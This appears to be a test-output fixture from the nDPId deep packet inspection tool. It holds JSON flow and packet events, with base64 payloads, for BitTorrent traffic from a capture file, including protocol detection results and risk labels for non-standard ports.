-00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1455469978662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469978662,"pkt":"xCwDBkn+LFbcjDU0CABFAACrdTRAAHcGzXJf6p8QwKgBA6D1zrlkqPSW1A6dPYAYAMM1JwAAAQEICgIQtLMZ3BteE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wos5cW3r846cWQCoAAADoFABkMTplaTBlNDppcHY0NDpf6p8QMTI6Y29tcGxldGVfYWdvaTQ1ZTE6bWQxMTo="} -01296{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1455469978678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":587,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":587,"pkt_l4_len":553,"thread_ts_msec":1455469978678,"pkt":"xCwDBkn+LFbcjDU0CABFAAI9dTZAAHcGy95f6p8QwKgBA6D1zrlkqPUN1A6dPYAZAMPqbAAAAQEICgIQtLMZ3BtedXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTQxMjA1ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1MjkyMWU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/7\/\/\/\/\/\/\/\/\/f\/\/\/\/9\/\/\/\/3\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/v7\/\/v\/\/\/\/\/7\/\/3\/f\/\/\/\/\/r\/\/\/v\/\/\/\/9\/\/\/\/\/\/\/\/\/+\/\/\/\/\/3\/7\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/9\/\/\/\/\/9\/\/f\/4AAAAAFBAAAACUAAAAFBAAAAJwAAAAFBAAAArkAAAAFBAAAAfAAAAAFBAAAA3QAAAAFBAAAAosAAAAFBAAAAZ8AAAAFBAAAAdUAAAAFBAAAAqwAAAAFBAAAAhUAAAAFBAAAAM0AAAAFBAAAAk4AAAAFBAAAAIAAAAAFBAAAA4IAAAAFBAAAAF4AAAAFBAAAAi0AAAAFBAAAAVYAAAAFBAAAAZcAAAAFBAAAA1AAAAAFBAAAAeYAAAAFBAAAAa8AAAAFBAAAAhcAAAAFBAAAAw0AAAAFBAAAARs="} -01298{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1455469978679,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":586,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":586,"pkt_l4_len":552,"thread_ts_msec":1455469978679,"pkt":"xCwDBkn+LFbcjDU0CABFAAI8IwBAAHYG\/QBf7cEiwKgBAyw5zrr6gfxfv4GyU4AZAQJxbQAAAQEICgADmIEZ3BtmcGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpMTEzMjFlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTIyZTY6eW91cmlwNDpSN80BZQAAAHQF\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/+\/\/7\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/v\/\/v\/\/+P\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/+\/7\/7\/\/\/\/\/\/7\/\/\/\/\/\/v\/\/3+\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/9\/\/\/7\/\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/3\/\/gAAAAAUEAAACNQAAAAUEAAACYwAAAAUEAAADgAAAAAUEAAAB1wAAAAUEAAAAyQAAAAUEAAABzQAAAAUEAAACUQAAAAUEAAABYQAAAAUEAAACzQAAAAUEAAAApQAAAAUEAAACtgAAAAUEAAACSAAAAAUEAAACDQAAAAUEAAABIQAAAAUEAAABYwAAAAUEAAAC5wAAAAUEAAAAlQAAAAUEAAABYgAAAAUEAAABlQAAAAUEAAADQQAAAAUEAAAB4wAAAAUEAAABOQAAAAUEAAABSwAAAAUEAAAAfQ=="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980213,"flow_last_seen":1455469980213,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980213,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1455469980213,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469980213,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4U25AAEAGAADAqAEDU9i48c6\/yNUzq1kTBM6UFIAYL5vO3wAAAQEIChncIiN4G2eaE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjq+Lj4Q+qUQM4PY="} -00727{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980213,"flow_last_seen":1455469980213,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980213,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980262,"flow_last_seen":1455469980262,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980262,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1455469980262,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469980262,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4esFAAEAGAADAqAEDXUH5ZM6+emiQl\/fDL3XicoAYTYMYvAAAAQEIChncIlIAH\/RSE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjkTA1ljAvA+q8j0="} -00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980262,"flow_last_seen":1455469980262,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980262,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":115,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980275,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1455469980275,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469980275,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4g5FAAEAGAADAqAEDXUHjZM69Sqzdpe7S802+OYAYVXMCvAAAAQEIChncIl4AhA2FE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjlkhEgSgYOOKqPw="} -00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980275,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1455469980297,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1455469980297,"pkt":"xCwDBkn+LFbcjDU0CABFYACEPABAADIGPZ9T2LjxwKgBA8jVzr8EzpQUM6tZV4AYECksHwAAAQEICngbZ84Z3CIjE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMTg4Qi2qnlHDgsE5LNSCYRoAAAEAFABkMTplaTA="} -01382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1455469980371,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":650,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":650,"pkt_l4_len":616,"thread_ts_msec":1455469980371,"pkt":"xCwDBkn+LFbcjDU0CABFYAJ8C7pAADIGa+1T2LjxwKgBA8jVzr8EzpRkM6tZV4AYECkszQAAAQEICngbaAwZ3CJzZTQ6aXB2NDQ6U9i48TQ6aXB2NjE2Ov6AAAAAAAAA6gaI\/\/7N9BMxMjpjb21wbGV0ZV9hZ29pMWUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTUxNDEzZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDEuOC44Mjp5cGk1MjkyN2U2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/v\/\/\/\/\/\/\/\/9\/f\/+\/\/9\/\/\/f\/\/\/\/\/\/\/73v\/\/\/\/\/\/\/\/\/\/f\/9\/\/\/\/\/\/\/\/\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/3\/\/7\/\/3\/9v\/\/\/9+\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/+\/\/\/\/7\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAiQAAAAFBAAAAQwAAAAFBAAAAisAAAAFBAAAArIAAAAFBAAAAFgAAAAFBAAAAxMAAAAFBAAAAgYAAAAFBAAAAfgAAAAFBAAAAvcAAAAFBAAAAm0AAAAFBAAAAMYAAAAFBAAAA0sAAAAFBAAAAXAAAAAFBAAAAMEAAAAFBAAAAecAAAAFBAAAABcAAAAFBAAAAI4AAAAFBAAAAHoAAAAFBAAAAgkAAAAFBAAAAMsAAAAFBAAAAGkAAAAFBAAAARwAAAAFBAAAAdQAAAAFBAAAAFA="} -00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1455469980390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":182,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":182,"pkt_l4_len":148,"thread_ts_msec":1455469980390,"pkt":"xCwDBkn+LFbcjDU0CABFAACocqBAAHMGfF5dQflkwKgBA3pozr4vdeJykJf4B4AYAMOuCwAAAQEICgAf9F4Z3CJSE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wogL0Pl3FbMgdQMAAAAEAFABkMTplaTBlNDppcHY0NDpdQflkNDppcHY2MTY6IAEAAF71ef0Mhifaor4="} -01334{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1455469980488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":614,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":614,"pkt_l4_len":580,"thread_ts_msec":1455469980488,"pkt":"xCwDBkn+LFbcjDU0CABFAAJYcqJAAHMGeqxdQflkwKgBA3pozr4vdeLmkJf4B4AZAMO1LAAAAQEICgAf9F8Z3CJSBpsxMjpjb21wbGV0ZV9hZ29pMmUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTMxMzM2ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1MjkyNmU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/\/\/99\/\/\/\/\/\/9\/\/+\/\/\/\/\/\/\/\/7\/\/3\/\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/v\/\/\/\/\/9\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/\/36\/\/\/\/\/93\/\/\/\/\/\/\/\/\/\/\/\/\/fv\/\/\/9P\/\/3\/\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAm0AAAAFBAAAApQAAAAFBAAAAI0AAAAFBAAAA0AAAAAFBAAAASAAAAAFBAAAAwgAAAAFBAAAAHoAAAAFBAAAAV0AAAAFBAAAAfQAAAAFBAAAAwsAAAAFBAAAAmsAAAAFBAAAAhwAAAAFBAAAAuYAAAAFBAAAAmQAAAAFBAAAApAAAAAFBAAAAFAAAAAFBAAAAc0AAAAFBAAAAa0AAAAFBAAAAx4AAAAFBAAAANIAAAAFBAAAAu0AAAAFBAAAAwoAAAAFBAAAAEoAAAAFBAAAAME="} -00838{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469967550,"flow_last_seen":1455469968002,"flow_idle_time":7440000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":871,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00839{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469974533,"flow_last_seen":1455469974889,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":875,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00701{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1455469969259,"flow_last_seen":1455469973374,"flow_idle_time":7440000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":582,"flow_tot_l4_payload_len":1030,"flow_avg_l4_payload_len":128,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469980213,"flow_last_seen":1455469981133,"flow_idle_time":7440000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":584,"flow_tot_l4_payload_len":1048,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00841{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469978422,"flow_last_seen":1455469978679,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":875,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00841{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469975240,"flow_last_seen":1455469975394,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":87,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00840{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469970233,"flow_last_seen":1455469971153,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":951,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00841{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469975234,"flow_last_seen":1455469976169,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":534,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00841{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469978413,"flow_last_seen":1455469978679,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":882,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00841{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1455469980262,"flow_last_seen":1455469980488,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":732,"flow_avg_l4_payload_len":244,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00840{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469971675,"flow_last_seen":1455469973590,"flow_idle_time":7440000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":87,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00843{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1455469976582,"flow_last_seen":1455469980118,"flow_idle_time":7440000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":584,"flow_tot_l4_payload_len":1088,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 